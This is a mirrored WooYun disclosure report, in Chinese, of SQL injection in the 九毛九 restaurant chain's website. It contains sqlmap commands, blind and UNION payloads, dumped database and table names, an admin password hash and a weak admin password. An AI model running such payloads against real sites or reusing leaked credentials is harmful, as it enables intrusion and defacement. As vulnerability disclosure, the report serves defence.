乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-22: 细节已通知厂商并且等待厂商处理中 2015-08-25: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-04: 细节向核心白帽子及相关领域专家公开 2015-09-14: 细节向普通白帽子公开 2015-09-24: 细节向实习白帽子公开 2015-10-09: 细节向公众公开
九毛九SQL注射漏洞,暴露多个数据库,后台弱密码。
首页POST注入
sqlmap.py -u http://**.**.**.**/index.html --forms
扫描到相关信息2003的系统 Microsoft IIS 6.0, PHP 5.3.28 MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:---Parameter: gjz (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: gjz=CHpn') AND (SELECT * FROM (SELECT(SLEEP(5)))rPWy) AND ('cwEA'='cwEA&= Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: gjz=CHpn') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x714a504556644a587757,0x7176717171),NULL,NULL-- &=---do you want to exploit this SQL injection? [Y/n] [23:52:59] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, PHP 5.3.28back-end DBMS: MySQL 5.0.12
网站后台地址:
http://www.**.**.**.**/admin/
通过数据库可以查询到后台用户名admin 密码11111登陆后台后可随意更改网站内容。
---Parameter: gjz (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: gjz=CHpn') AND (SELECT * FROM (SELECT(SLEEP(5)))rPWy) AND ('cwEA'='cwEA&= Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: gjz=CHpn') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x714a504556644a587757,0x7176717171),NULL,NULL-- &=---do you want to exploit this SQL injection? [Y/n] [23:52:59] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, PHP 5.3.28back-end DBMS: MySQL 5.0.12[23:52:59] [INFO] fetching database namesavailable databases [9]:[*] db_dodi[*] disc[*] information_schema[*] jmjweb[*] mysql[*] performance_schema[*] test[*] ultrax[*] wxac
Database: jmjweb[17 tables]+-----------------+| admin || admin_menu || admin_power || admin_powerzllb || createhtml || guestbook || itemconfig || jbzl || link || mainpage || news || news_item || news_tags || news_zllb || product || product_zllb || wwwuser |+-----------------+
Database: jmjwebTable: admin[1 entry]+---------------------+----------------------------------+----------+----------+---------------------+----------------+| reg_tm | userpwd | username | realname | login_tm | login_ip |+---------------------+----------------------------------+----------+----------+---------------------+----------------+| 2010-07-16 00:00:00 | 96e79218965eb72c92a549dd5a330112 | admin | 绠$.?. | 2015-08-18 21:32:22 | **.**.**.** |+---------------------+----------------------------------+----------+----------+---------------------+----------------+
后台
可随意更改内容
过虑参数
危害等级:高
漏洞Rank:11
确认时间:2015-08-25 10:16
暂未建立与网站管理单位的直接处置渠道,待认领.
暂无